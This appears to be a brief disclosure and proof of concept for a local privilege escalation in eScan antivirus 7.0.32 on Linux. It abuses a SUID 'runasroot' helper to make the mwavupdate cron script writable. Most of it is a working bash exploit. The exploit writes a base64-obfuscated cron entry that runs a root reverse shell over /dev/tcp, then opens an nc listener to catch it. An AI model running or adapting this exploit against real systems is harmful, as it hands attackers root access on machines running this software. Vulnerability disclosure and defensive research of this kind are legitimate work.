Priv Esc in eScan antivirus 7.0.32

Context:

  • This software ships a file, mwavupdate, which is a crontab script. The installer creates a symlink to it in /etc/cron.d so that the system runs updates via a cron job
  • runasroot is a SUID binary that lets an unprivileged user change the permissions of certain files using chmod. mwavupdate is in that list too
    → An attacker can change the permissions of mwavupdate and overwrite the crontab with a malicious task to execute system commands as root

Exploit demo that gains a reverse shell (localhost)

#!/bin/bash
# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
echo "KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888
